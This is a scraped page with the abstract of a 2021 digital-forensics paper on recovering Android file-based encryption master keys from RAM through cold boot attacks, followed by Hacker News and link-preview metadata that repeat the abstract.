Recovering the master key from RAM to break Android's file-based encryption (2021)

https://www.sciencedirect.com/science/article/pii/S266628172100007X

Elsevier

Forensic Science International: Digital Investigation

Under a Creative Commons license

open access

Abstract

As known for a decade, cold boot attacks can break software-based disk encryption when an attacker has physical access to a powered-on device, including Android smartphones. Raw memory images can be obtained by resetting a device and rebooting it with a malicious boot loader, or—on systems where this is not possible due to secure boot or restrictive BIOS settings—by a physical transplantation of RAM modules into a system under the control of the attacker. Based on the memory images of a device, different key recovery algorithms have been proposed in the past to break Full Disk Encryption (FDE), including BitLocker, dm-crypt, and also Android's FDE. With Google's switch from FDE to File-based Encryption (FBE) as the standard encryption method for recent Android devices, however, existing tools have been rendered ineffective. To close this gap, and to re-enable the forensic analysis of encrypted Android disks, given a raw memory image, we present a new key recovery method tailored for FBE. Furthermore, we extend The Sleuth Kit (TSK) to automatically decrypt file names and file contents when working on FBE-enabled EXT4 images, as well as the Plaso framework to extract events from encrypted EXT4 partitions. Last but not least, we argue that the recovery of master keys from FBE partitions was particularly easy due to a flaw in the key derivation method by Google.

Keywords

Android

EXT4

File-based encryption (FBE)

Disk forensics

Memory forensics

Cold boot attacks

Cited by (0)

© 2021 The Authors. Published by Elsevier Ltd.

{
"by": "thunderbong",
"descendants": 14,
"id": 40235193,
"kids": [
40236221,
40258805,
40235875,
40235947,
40235945
],
"score": 54,
"time": 1714651622,
"title": "Recovering the master key from RAM to break Android's file-based encryption (2021)",
"type": "story",
"url": "https://www.sciencedirect.com/science/article/pii/S266628172100007X"
}
{
"author": "Author links open overlay panelTobias Groß, Marcel Busch, Tilo Müller",
"date": null,
"description": "As known for a decade, cold boot attacks can break software-based disk encryption when an attacker has physical access to a powered-on device, includi…",
"image": "https://ars.els-cdn.com/content/image/1-s2.0-S2666281721X00030-cov150h.gif",
"logo": "https://logo.clearbit.com/sciencedirect.com",
"publisher": "ScienceDirect",
"title": "One key to rule them all: Recovering the master key from RAM to break Android’s file-based encryption",
"url": "https://www.sciencedirect.com/science/article/pii/S266628172100007X"
}
{
"url": "https://www.sciencedirect.com/science/article/pii/S266628172100007X",
"title": "One key to rule them all: Recovering the master key from RAM to break Android's file-based encryption",
"description": "View PDFUnder a Creative Commons licenseopen accessAbstractAs known for a decade, cold boot attacks can break software-based disk encryption when an attacker has physical access to a powered-on device,...",
"links": [
"https://www.sciencedirect.com/science/article/pii/S266628172100007X"
],
"image": "https://ars.els-cdn.com/content/image/1-s2.0-S2666281721X00030-cov150h.gif",
"content": "<div><div><div><ul><li><a target=\"_blank\"><svg height=\"20\"></svg><span><span><span>View <strong>PDF</strong></span></span></span></a></li><li></li></ul></div><div><article><div><p><a target=\"_blank\" href=\"https://www.sciencedirect.com/journal/forensic-science-international-digital-investigation\" title=\"Go to Forensic Science International: Digital Investigation on ScienceDirect\"><span><span><img src=\"https://sdfestaticassets-us-east-1.sciencedirectassets.com/prod/b64013ec63c69e3d916174cbebae89d65b2419e1/image/elsevier-non-solus.png\" alt=\"Elsevier\" /></span></span></a></p><p><a target=\"_blank\" href=\"https://www.sciencedirect.com/journal/forensic-science-international-digital-investigation/vol/36/suppl/S\"><span><span><img src=\"https://ars.els-cdn.com/content/image/1-s2.0-S2666281721X00030-cov150h.gif\" alt=\"Forensic Science International: Digital Investigation\" /></span></span></a></p></div><div><p><span>Under a Creative Commons </span><a href=\"http://creativecommons.org/licenses/by-nc-nd/4.0/\" target=\"_blank\"><span><span>license</span><svg height=\"20\"></svg></span></a></p><p><span></span>open access</p></div><div><h2>Abstract</h2><div><p>As known for a decade, cold boot attacks can break software-based disk encryption when an attacker has physical access to a powered-on device, including Android smartphones. Raw memory images can be obtained by resetting a device and rebooting it with a malicious boot loader, or—on systems where this is not possible due to secure boot or restrictive BIOS settings—by a physical transplantation of RAM modules into a system under the control of the attacker. Based on the memory images of a device, different key recovery algorithms have been proposed in the past to break <em>Full Disk Encryption</em> (<em>FDE)</em>, including BitLocker, dm-crypt, and also Android's FDE. With Google's switch from FDE to <em>File-based Encryption (FBE)</em> as the standard encryption method for recent Android devices, however, existing tools have been rendered ineffective. To close this gap, and to re-enable the forensic analysis of encrypted Android disks, given a raw memory image, we present a new key recovery method tailored for FBE. Furthermore, we extend <em>The Sleuth Kit (TSK)</em> to automatically decrypt file names and file contents when working on FBE-enabled EXT4 images, as well as the <em>Plaso</em> framework to extract events from encrypted EXT4 partitions. Last but not least, we argue that the recovery of master keys from FBE partitions was particularly easy due to a flaw in the key derivation method by Google.</p></div></div><ul><li></li><li></li></ul><div><h2>Keywords</h2><p><span>Android</span></p><p><span>EXT4</span></p><p><span>File-based encryption (FBE)</span></p><p><span>Disk forensics</span></p><p><span>Memory forensics</span></p><p><span>Cold boot attacks</span></p></div><section><h2>Cited by (0)</h2></section><p><span>© 2021 The Authors. Published by Elsevier Ltd.</span></p></article></div></div></div>",
"author": "",
"favicon": "https://sdfestaticassets-us-east-1.sciencedirectassets.com/shared-assets/103/images/favSD.ico",
"source": "sciencedirect.com",
"published": "",
"ttr": 49,
"type": "article"
}